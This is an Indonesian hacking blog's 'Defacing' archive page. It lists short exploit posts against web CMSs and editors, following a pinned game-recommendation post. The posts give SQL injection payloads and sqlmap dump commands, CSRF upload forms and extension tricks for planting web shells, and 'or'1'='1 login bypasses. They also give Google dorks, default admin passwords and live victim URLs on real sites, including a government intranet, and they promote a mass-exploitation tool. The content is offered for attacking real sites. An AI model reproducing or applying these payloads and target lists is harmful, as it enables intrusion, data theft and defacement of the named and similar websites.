Langsung ke konten utama

Postingan

Menampilkan postingan dengan label Defacing

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Sekarang, banyak sekali jenis game online bertebaran. Mulai MMORPG sampai dengan Game Simulation atau yang lebih familiar dikenal game simulator. Belakangan yang banyak dimainkan adalah game simulator yang menawarkan pengalaman melakukan aktivitas dengan simulasi. Ada yang life-simulation games, vehicle simulation, dan masih banyak lagi lainnya. Tahun 2020 ini juga banyak bermunculan game simulator yang tidak kalah seru dari sebelum-sebelumnya. Bagi yang sedang mencari rekomendasi, berikut ini akan adalah daftar game simulator patut dicoba yang pertama, Bus Simulator Indonesia Pertama datang dari Tanah Air ada yang namanya Bus Simulator Indonesia atau biasa disingkat BUSSID. Game ini cocok sekali bagi yang ingin merasakan sensasi supir bus Indonesia apalagi bila menginstall mod yang didapat dari anonytun.com, di sana Anda bisa mendapatkan banyak pilihan bus, truk dan mobil yang seru secara gratis. A da simulasi bus antarkota, antarprovinsi,  bahkan antar pulau. Karena ada fi...

Property Castle CMS post SQL injection

 Exploit Title: Property Castle CMS post SQL injection  Google Dork: inurl:“/cms/cms.php?link_id=” 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ we will have database name 2- we search “contact us” page 3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) 4- we use sqlmap tool now and inject it with POST method EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] #admin page: http://website/admin/index.php

Tinymce 4 Image Manager

Author : Khuneable  Anti burp y  :D CSRF <form enctype="multipart/form-data" action="sitecom/tinymce/plugins/image/upload.php" method="post"> <input type="file" name="upl" multiple="multiple"> <input type="submit" value="Proccess!"> </form> Upload shell bentuk gambar dlu ya terus next dibawah Setelah upload sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php CSRF Online : https://www.exploit.sultra1news.com/csrf.php Live : http://azyb.az/admin/media/tinymce/plugins/image/upload.php Shell : sitecom/path/tinymce/plugins/image/rename_file.php?current_name=namafilesebelumdiganti.php.jpg&new_name=namafilebaru.php

Exploit jBImages Tinymce

Exploit jBImages Tinymce POC : sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english CSRF: <form enctype="multipart/form-data" action="sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english" method="post"> <input type="file" name="userfile" multiple="multiple"> <input name="upload_target" value="./"> <input type="submit" value="josskan!"> </form> Shells uploaded : ??? Demo :  Here Files uploaded :  http://calptower.org/images/hacked.jpg Typical Idiot Security Greet's : Zerobyte.ID - IndoXploit 

ImageBrowser FileUpload Vulnerabillity

# Author : SPEEDY-03 # Exploit Title : ImageBrowser FileUpload Vulnerabillity # Date 05/26/2018 # Tested On Windows 7 # Greetz : Typical idiot Security & ZeroByte.id =============================================== * Demo :  http://intranet.kemendag.go.id/modules/itpc/ * Default Login : admin/admin * Dork : /ckeditor/plugins/imageuploader/uploads/ * Exploit : /ckeditor/plugins/imageuploader/imgbrowser.php * Proof :  http://intranet.kemendag.go.id//6242d094.jpg NB : EXPLOIT INI HANYA BISA UPLOAD .JPG / IMAGE

Aonestar CMS BackDoor Vulnerability

Title : Aonestar CMS BackDoor Vulnerability Credit : MrHoudini Date : 9-1-2018 Dork : intext:"D & D by Aonestar" Username : admin Password : admin Sites : http://infodevvideo.co.uk/admin/ http://beaconhousenursing.co.uk/admin/ http://anayatfoundation.org/aytadmin/

K-LOANS 1.4.5 Backdoor account Vulnerability

============================================================================ | # Title : K-LOANS 1.4.5 Backdoor account Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Version : v 1.4.5 | | # Vendor : https://codecanyon.net/item/loan-management-system/11454263| | # Dork : K-LOANS 1.4.5 | ============================================================================ poc : [+] Dorking İn Google Or Other Search Enggine [+] user : admin & pass = admin123 http://www.garciuz.com/prestar/index.php/home

Website Sekolah Gratis - Responsive FileManager

  # Exploit Title: Website Sekolah Gratis - Responsive FileManager # Google Dork: intext:"Setup by Website Sekolah Gratis." # Date: 28 December 2017 (Indonesia) # Exploit Author: AlHikam0x # Tested on: Ubuntu Proof of Concept 1. Responsive FileManager https://web-target/include/filemanager/dialog.php View Responsive FileManager : HERE 2. Upload Shell shell.php.fla and more. 3. Right click, Show URL https://web-target/files/shell.php.fla

Global Webmasters - Admin Panel Bypass

# Exploit Title: Global Webmasters - Admin Panel Bypass # Google Dork: intext:" by GlobalWebmasters" # Date: 30 December 2017 # Exploit Author: AlHikam0x # Vendor Homepage: https://www.sajtovi-izrada.com # Tested on: Ubuntu Proof of Concept 1. Login Admin Panel. https://web-target/admin or login , etc. 2. Input username and password (bypassing) Username: '=''or' Password: '=''or' I test it directly to the developer site, and the client site also has the same vulnerability. Development is Vulnerability! https://www.sajtovi-izrada.com/

雅风工作室 - Arbitrary File Upload

# Exploit Title: 雅风工作室 - Arbitrary File Upload # Google Dork: intext:"Htmcss.Com All Rights Reserved" # Date: 30 December 2017 # Exploit Author: AlHikam0x # Vendor Homepage: http://www.htmcss.com # Tested on: Ubuntu Proof of Concept 1. Check Vulnerability. https://web-target/tpl/plugins/upload9.1.0/server/php/ 2. Array type Upload : files[] 3. Check file uploaded. https://web-target/tpl/plugins/upload9.1.0/server/php/files/1234567_.php

Al3jeb v1.3 Auth by pass Vulnerability

| # Title : Al3jeb v1.3 Auth by pass Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 10 Français V.(Pro) | # Version : v1.3 | # Vendor : http://cs4pc.com/ | # Dork : n/a ======================================================================== poc : http://bahaa.e-hosttec.com/index.php user : 1'or'1'='1 Pass : 1'or'1'='1

Dimofinf CMS Arbitrary File Upload

# Exploit Title: Arbi Arbitrary File Upload Vulnerability # Google Dork: intext:" Powered by Dimofinf " # Date: 2017-12-20 # Author: Iran Anonymous # Tested on: Win 7, Linux *************************************************** # exploit => /editor/filemanager/connectors/uploadtest.html # Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html *************************************************** # Proof : http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.arbi.ws///userfiles/Hack.txt =====================================================

softventurs Admin Page Noredirect

########################################################################### # Exploit Title: Admin Page Noredirect [softventurs] # Author : Magelang1337 # Google Dork 1 : Developed by Softventurs # Google Dork 2 : Designed By - softventurs # Google Dork 3 : Powered By - softventurs # Vendor Home: http://www.softventurs.in # Tested On Mozilla Firefox ########################################################################### Tutorial : [+] Download Addons "Noredirect" [Mozilla] [+] insert admin page >> http://gauravbooks.com/admin/ to Addons Mozilla [Noredirect] [+] Open new tab on Mozilla >> http://gauravbooks.com/admin/main.php Demo : http://gauravbooks.com/admin/ http://www.chaperonbiotech.com/admin/ http://www.rataniti.com/admin/ http://garimaprakashan.com/admin/ http://www.baradeviiti.org/admin/ http://deltinlaboratories.com/admin/ http://www.paradisepublicschool.co.in/admin/ http://chandralokprakashan.com/admin/ http://www.sagimetalbox.com/admin/ http://times...

United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability

# Exploit Title: United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability # Google Dork: intext:" Powered by Dimofinf cms Version 4.0.0 " # Date: 2017-12-20 # Author: Iran Anonymous # Tested on: Win 7, Linux # exploit => /editor/filemanager/connectors/uploadtest.html # Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html *************************************************** # Proof : http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.arbi.ws///userfiles/Hack.txt ***************************************************  # We have downloaded the database for this site for you : http://www.arbi.ws//arbi.zip

2X TEKNOLOJİ auth by pass vulnerability

======================================================================== | # Title : 2X TEKNOLOJİ auth by pass vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : V 2 | # Vendor : http://2xteknoloji.com/ | # Dork : Design By 2X TEKNOLOJİ ======================================================================== poc : user : 1'or'1'='1 pass : 1'or'1'='1 Login : http://oresvinc.com/panel/proje.php

2X Ajans auth by pass vulnerability

======================================================================== | # Title : 2X Ajans auth by pass vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : V 2 | # Vendor : http://www.2xajans.com/ | # Dork : Design by 2X Ajans ======================================================================== poc : http://www.2xajans.com/panel/ user : 1'or'1'='1 Pass : 1'or'1'='1

IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:"Powered by IIS Group" # Tested on : Kali Linux 2017 Chrome, Firefox # Date : 20.12.2017 # Vendor Home: http://www.iisgroup.co.za/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] /admin/ [+] /admin/login.asp [+] Sql GET parameter 'cat' is vulnerable Video: https://youtu.be/YhGVu5wTtrQ  Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump  Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=35 AND 83...

Auto Exploit Werehouse All Modules [BASH]

Hello, Kali ini saya akan membagikan tools Auto Exploit Werehouse All Modules [BASH] . Beberapa hari yang lalu sudah ada yang menunggu tools ini disebarkan dan sekarang saya akan sebarkan. Untuk download source : GitHub WereHouse Usage : ./Werehouse_All_Modules.sh Bing dorking =>  Bing Grab [BASH] Auto exploit com_fabrik => Auto Exploit Com_Fabrik [BASH] Mass exploiter CMS Joomla! => Joomla Mass Exploiter Tools V.1Joomla Mass Exploiter Tools V.1 Jika ada yang mau ditanyakan, silahkan di group aja ya: https://www.facebook.com/groups/1705027012853306/ sumber : http://blog.zerobyte.id/2017/12/Auto-Exploit-Werehouse-All-Modules-Bash.html

Webspert 2.2rc2a osCommerce Multi vulnerability

======================================================================== | # Title : Webspert 2.2rc2a osCommerce Multi vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : 2.2rc2a | # Vendor : http://www.webspert.com.my/ | # Dork : "Powered by Webspert" ======================================================================== poc : Webspert based on osCommerce version 2.2rc2a (2007) & osCommerce version 2.2rc2a suffers from a cross site request forgery vulnerability. =https://packetstormsecurity.com/files/92311/osCommerce-2.2rc2a-Cross-Site-Request-Forgery.html so 1 - Csrf : http://www.kamazingart.com/private/backup.php/login.php 2 - backdoor Acounte : http://www.kamazingart.com/private/ user : admin Pass : conny123@ Sql injection : http://www.sarayazahret.com/page.php?pageid=33

Gstudio Default Admin Pass Vulnerability

# Exploit Title: Gstudio Default Admin Pass Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:gstudio-branding OR ===> design by www.gstudio.co.za 0R ===> ontwerp www.gstudio.co.za OR ===> branding | www.gstudio.co.za # Tested on : Kali Linux 2017 Chrome, Firefox # Date : 18.12.2017 # Vendor www.gstudio.co.za # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] Manager www.localhost.com/cms/index.php Username: admin Password: admin Demo: http://www.gstudio.co.za/cms/index.php ===> admin admin http://root44.co.za/cms/index.php ===> admin admin http://www.burma.co.za/cms/index.php ===> admin admin http://froggit.co.za/cms/index.php ===> admin admin FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!

DreamWorth Solutions Kcfinder upload

Exploit title : DreamWorth Solutions Kcfinder upload Author : Mr.Hydra Google Dork : intext:"Powered by DreamWorth Solutions Pvt Ltd" Tested on : Windows XP & Windows 7 Date : 2017-12-20 Vendor Hompage : https://www.dreamworth.in/ Tutor : Dorking dork in google Open Target exploit targer for exploit : /admin/js/plugins/kcfinder-master/browse.php or /administrator/js/plugins/kcfinder-master/browse.php Upload yoour shell with bypas ext shell.php.fla or shell.php.pjpg or shell.php.php5 or shell.PhP.black acces your shell in : /admin/js/plugins/kcfinder-master/upload/files/yourshell or /administrator/js/plugins/kcfinder-master/upload/files/yourshell For demo : https://www.dreamworth.in/admin/js/plugins/kcfinder-master/browse.php